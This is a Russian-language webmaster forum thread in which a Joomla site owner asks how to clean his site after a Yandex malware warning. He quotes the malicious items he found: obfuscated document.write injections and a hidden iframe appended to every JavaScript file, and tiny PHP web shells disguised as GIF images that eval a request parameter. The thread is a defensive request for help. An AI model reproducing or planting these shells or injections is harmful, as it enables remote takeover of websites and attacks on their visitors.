Товарищи помогите... вчера пришло письмо в панели вебмастера: "На страницах сайта newregion-xm.ru обнаружен код, который может быть опасен для посетителей. Выполнение этого кода может привести к заражению компьютера опасными программами, использованию его без ведома пользователя, порче или краже данных. В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера». Яндекс никак не оценивает содержание сайта и предупреждает пользователей о том, что сайт мог быть заражен без ведома его владельцев. Пожалуйста, удалите вредоносный код. Если при новой проверке код не будет обнаружен, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта." и в списке страниц есть главная страница http://newregion-xm.ru/ но как я не смотрел код главной страницы так и не нашел ничего подозрительного кроме одного места: Код (PHP): <!--[if lte IE 6]><script src="/plugins/system/J2top/fixed.js" type="text/javascript"></script><![endif]--> <script type="text/javascript">if( MooTools.version >= '1.2' ) { window.addEvent('domready',function() { new SmoothScroll({ duration: 250 }, window); var gototop = $('gototop'); gototop.setStyle('opacity','0').setStyle('display','block'); }); window.addEvent('scroll',function(e) { var gototop = $('gototop'); if(Browser.Engine.trident4) { gototop.setStyles({ 'position': 'absolute', 'bottom': window.getPosition().y + 10, 'width': 100 }); } gototop.fade((window.getScroll().y > 200) ? 'in' : 'out') }); } else { window.addEvent('domready',function() { $('gototop').setStyle('opacity','0'); new SmoothScroll(); var Change = new Fx.Style('gototop', 'opacity', {duration:250}); var scroll = window.getScrollTop(); if (scroll > 200){ if ($('gototop').getStyle('opacity','0') == 0){Change.start(1);$('gototop').setStyle('display','');} } }); window.addEvent('scroll',function(e) { var scroll = window.getScrollTop(); var Change = new Fx.Style('gototop', 'opacity', {duration:250}); function Show(){ $('gototop').setStyle('display','');} function Hide(){ setTimeout("$('gototop').setStyle('display','none')",250);} if (scroll > 200){ if ($('gototop').getStyle('opacity','0') == 0){Show();Change.start(1);} } else { if ($('gototop').getStyle('opacity','1') == 1){Change.start(0);Hide();} } }); } </script> может ли яндекс посчитать это за вирус???? спасибо заранее...
вот что нашел в каждом файле *.js Код (PHP): ;document.write(unescape(".............OOO))); Как это убрать из всех яваскрипт файлов?
сделал проще - удалил все из корневой папки - и попросил ТП хостера восстановить резервные копии от 15 марта - вроде глянул в несколько фалов js - чистые
и еще вопрос - как можно (вернее чем) почистить сайт от шелов? и каким образом найти уязвимое расширение?
Нашел вчера в папке /images/stories подозрительные файлы f1h3a.gif - ничем не открывается кроме блокнота с таким содержанием: Код (PHP): GIF89a1 <?php if (isset($_REQUEST['p1'])) { eval(stripslashes($_REQUEST['p1'])); } else { echo "djeu84m"; } ?> story.gif с содержанием Код (PHP): GIF89a1 <?php if (isset($_REQUEST['p1'])) { eval(stripslashes($_REQUEST['p1'])); } else { echo "djeu84m"; } ?> gif.php с содержанием Код (PHP): GIF89a1 <?php if (isset($_REQUEST['p1'])) eval(stripslashes($_REQUEST['p1'])); ?> Кто нибудь может подсказать их назначение (этих файлов) и как они попали в эту папку. как бы сделать так чтоб в эту папку никто ничего не заталкивал не нужного??
Да, еще хотел спросить: в каждом *.js файле в конце такие строки: Код (PHP): ;document.write('<iframe style="position:fixed;top:0px;left:-500px;" src="<html> <head><title>502 Bad Gateway</title></head> <body bgcolor="white"> <center><h1>502 Bad Gateway</h1></center> <hr><center>nginx</center> </body> </html> " height="350" width="250"></iframe>'); повторяются раз 5 - 10 что это значит и надо ли оно там?
Еще JAMSS - Joomla! Anti-Malware Scan Script - v.1.0.4 ругается на: Код (html): In file ./administrator/components/com_admin/admin.admin.html.php-> we found 2 occurence(s) of Pattern #18 - IFRAME element ---> Details: "Found IFRAME element in code, please check if it's a valid code." @Offset: 7259: ... <iframe name="helpFrame" src="<?php echo $fullhelpurl .preg_replace( '#\.xml$|\.html$#', '', $page );?>" class="helpFrame" frameborder="0"></iframe> <?php } else { ?> <iframe name=" ... @Offset: 7445: ... <iframe name="helpFrame" src="<?php echo JURI::base() .'help/' .$langTag. '/' . $page;?>" class="helpFrame" frameborder="0"></iframe> <?php } ?> </fieldset> </div> <input type="hi ... --> ./administrator/components/com_admin/admin.admin.html.php is a file. It was last accessed: 2013-03-31T13:28:12+06:00, last changed: 2013-03-30T08:22:48+06:00, last modified: 2013-01-09T00:16:57+06:00. File permissions:0644 это тоже вирус?